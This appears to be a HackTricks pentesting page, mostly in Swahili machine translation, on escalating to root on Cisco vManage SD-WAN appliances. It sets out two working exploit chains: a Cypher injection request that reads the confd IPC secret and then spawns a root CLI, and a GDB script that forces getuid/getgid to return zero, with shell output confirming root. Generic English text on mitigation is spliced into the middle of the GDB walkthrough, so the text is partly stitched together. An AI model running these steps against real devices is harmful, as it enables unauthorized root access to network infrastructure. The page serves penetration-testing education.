11 KiB
Cisco - vmanage
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Pata swag rasmi ya PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.
Njia 1
(Mfano kutoka https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)
Baada ya kuchunguza kidogo kupitia nyaraka zinazohusiana na confd
na programu za binary tofauti (zinazopatikana kwa akaunti kwenye tovuti ya Cisco), tuligundua kuwa ili kuthibitisha soketi ya IPC, inatumia siri iliyoko katika /etc/confd/confd_ipc_secret
:
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
Kumbuka kifaa chetu cha Neo4j? Inaendeshwa chini ya mamlaka ya mtumiaji 'vmanage', hivyo kuturuhusu kupata faili kwa kutumia udhaifu uliopita:
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
Programu ya confd_cli
haiungi mkono hoja za mstari wa amri lakini inaita /usr/bin/confd_cli_user
na hoja. Kwa hivyo, tunaweza kuita moja kwa moja /usr/bin/confd_cli_user
na seti yetu ya hoja. Hata hivyo, haionekani kwa urahisi na mamlaka yetu ya sasa, kwa hivyo tunapaswa kuipata kutoka kwenye rootfs na kuikopy kupitia scp, kusoma msaada, na kuitumia ili kupata kikao cha amri:
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
Njia 2
(Mfano kutoka https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)
Blogi¹ ya timu ya synacktiv ilielezea njia nzuri ya kupata kikao cha root, lakini shida ni kwamba inahitaji kupata nakala ya /usr/bin/confd_cli_user
ambayo inaweza kusomwa tu na root. Nilipata njia nyingine ya kuongeza hadi kwa root bila usumbufu kama huo.
Nilipovunja vipande vipande faili ya /usr/bin/confd_cli
, niliona yafuatayo:
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3 mov %rax,%rbx
40165f: bf 1c 31 40 00 mov $0x40311c,%edi
401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>
401669: 49 89 c4 mov %rax,%r12
40166c: 48 85 db test %rbx,%rbx
40166f: b8 dc 30 40 00 mov $0x4030dc,%eax
401674: 48 0f 44 d8 cmove %rax,%rbx
401678: 4d 85 e4 test %r12,%r12
40167b: b8 e6 30 40 00 mov $0x4030e6,%eax
401680: 4c 0f 44 e0 cmove %rax,%r12
401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE
401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE
401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)
4016ac: 48 85 c0 test %rax,%rax
4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00 mov $0x3ff,%edx
4016ba: 48 89 c6 mov %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
Nilipokimbia "ps aux", niliona yafuatayo (note -g 100 -u 107)
vmanage:~$ ps aux
… snipped …
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
Nilidhani programu ya "confd_cli" inapitisha kitambulisho cha mtumiaji na kikundi ambacho kilikusanywa kutoka kwa mtumiaji aliyeingia kwenye programu ya "cmdptywrapper".
Jaribio langu la kwanza lilikuwa kukimbia moja kwa moja programu ya "cmdptywrapper" na kuiwezesha na -g 0 -u 0
, lakini lilishindikana. Inaonekana kuna kitambulisho cha faili (-i 1015) kilichoundwa mahali fulani njiani na siwezi kukidanganya.
Kama ilivyotajwa katika blogu ya synacktiv (mfano wa mwisho), programu ya confd_cli
haikubali vigezo vya amri ya mstari, lakini naweza kuathiri kwa kutumia kisakuzi na bahati nzuri GDB imejumuishwa kwenye mfumo.
Niliumba skripti ya GDB ambapo nililazimisha API ya getuid
na getgid
kurudisha 0. Tangu tayari nina ruhusa ya "vmanage" kupitia RCE ya deserialization, nina idhini ya kusoma moja kwa moja /etc/confd/confd_ipc_secret
.
root.gdb:
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
Cisco vManage
Description
Cisco vManage is a cloud-based network management platform that provides centralized control and visibility for Cisco SD-WAN devices. It allows network administrators to monitor, configure, and troubleshoot their SD-WAN infrastructure.
Privilege Escalation
Exploiting Misconfigurations
Default Credentials
Some versions of Cisco vManage may have default credentials that can be used to gain unauthorized access. Attackers can try common default usernames and passwords to exploit this misconfiguration.
Weak Passwords
If weak passwords are used for the Cisco vManage platform, attackers can use brute-force or dictionary attacks to guess the password and gain unauthorized access.
Exploiting Vulnerabilities
Remote Code Execution
If a vulnerability exists in the Cisco vManage platform that allows remote code execution, attackers can exploit it to execute arbitrary commands with elevated privileges.
SQL Injection
If the Cisco vManage platform is vulnerable to SQL injection attacks, attackers can manipulate database queries to gain unauthorized access or escalate privileges.
Exploiting Misconfigured Permissions
If the permissions on the Cisco vManage platform are misconfigured, attackers can exploit this to gain unauthorized access or escalate privileges. This can include misconfigured file or directory permissions, allowing attackers to read, write, or execute files they shouldn't have access to.
Mitigation
To mitigate privilege escalation risks in Cisco vManage, follow these best practices:
- Change default credentials immediately after installation.
- Use strong passwords that are resistant to brute-force or dictionary attacks.
- Regularly update the Cisco vManage platform to patch any known vulnerabilities.
- Implement proper access controls and permissions to prevent unauthorized access.
- Regularly review and audit the configuration of Cisco vManage to identify and fix any misconfigurations.
By following these best practices, you can reduce the risk of privilege escalation attacks on your Cisco vManage platform.
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Pata swag rasmi ya PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.